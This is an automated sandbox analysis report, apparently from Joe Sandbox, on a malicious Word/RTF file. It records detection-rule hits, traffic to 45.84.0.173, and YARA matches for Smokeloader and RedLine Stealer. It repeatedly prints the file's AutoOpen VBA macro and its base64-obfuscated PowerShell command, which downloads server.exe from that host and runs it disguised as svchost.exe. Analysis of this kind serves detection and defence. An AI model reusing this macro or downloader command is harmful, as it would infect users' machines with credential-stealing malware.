C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1408, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ProcessId: 1432, ProcessName: powershell.exe
        Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3084, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", ProcessId: 3188, ProcessName: svchost.exe
        Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1408, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ProcessId: 1432, ProcessName: powershell.exe
        Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1096, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
        Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1432, TargetFilename: C:\Users\user\AppData\Local\Temp\t52pnbyr.1tt.ps1
        No Snort rule has matched


        AV Detection

        Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Avira: detection malicious, Label: TR/Crypt.Agent.mvien
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe; ReversingLabs: Detection: 91%
        Source: 472.rtf.doc; ReversingLabs: Detection: 26%
        Source: 472.rtf.doc; Joe Sandbox ML: detected
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

        Software Vulnerabilities

        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\cmd.exe
        Source: global traffic; TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global traffic; TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
        Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Date: Thu, 23 May 2024 18:15:11 GMT; Server: Apache/2.4.38 (Debian); Last-Modified: Tue, 21 May 2024 06:39:08 GMT; ETag: "2d000-618f1132a7b00"; Accept-Ranges: bytes; Content-Length: 184320; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: application/x-msdos-program
        Source: global traffic; HTTP traffic detected: GET /download_22/server.exe HTTP/1.1; Host: 45.84.0.173; Connection: Keep-Alive
        Source: unknown; TCP traffic detected without corresponding DNS query: 45.84.0.173
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{89AD645A-9CDB-46AF-ADC6-EB1F41B38A0D}.tmp
        Source: powershell.exe, 00000006.00000002.358011203.0000000002936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002929000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://45.84.0.173
        Source: powershell.exe, 00000005.00000002.362102423.0000000002960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.357966848.0000000002397000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002731000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://45.84.0.173/download_22/server.exe
        Source: powershell.exe, 00000006.00000002.357966848.000000000247E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://go.cr
        Source: powershell.exe, 00000006.00000002.358011203.00000000038BE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://go.micros
        Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000005.00000002.362102423.0000000002451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002531000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        Source: Yara match; File source: 7.2.svchost.exe.220e67.0.raw.unpack, type: UNPACKEDPE

        System Summary

        Source: 00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: 00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: Process Memory Space: powershell.exe PID: 1432, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: 472.rtf.docOLE, VBA macro line: Program = Shell(cmdStr, vbHide)
        Source: ~DFF8D2936508DC487F.TMP.0.drOLE, VBA macro line: JbxHook_Shell_2_ = Shell(jbxparam0, jbxparam1)
        Source: 472.rtf.docOLE, VBA macro line: cmdStr = "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;"
        Source: VBA code instrumentationOLE, VBA macro: Module NewMacros, Function AutoOpen, String powershell: cmdStr = "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;"Name: AutoOpen
        Source: ~DFF8D2936508DC487F.TMP.0.drOLE, VBA macro line: cmdStr = "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE898B00DD6_2_000007FE898B00DD
        Source: 472.rtf.docOLE, VBA macro line: Sub AutoOpen()
        Source: VBA code instrumentationOLE, VBA macro: Module NewMacros, Function AutoOpenName: AutoOpen
        Source: ~DFF8D2936508DC487F.TMP.0.drOLE, VBA macro line: Sub AutoOpen()
        Source: 472.rtf.doc  OLE indicator, VBA macros: true
        Source: ~DFF8D2936508DC487F.TMP.0.dr  OLE indicator, VBA macros: true
        Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.dr  OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
        Source: ~DFF8D2936508DC487F.TMP.0.dr  OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
        Source: 00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
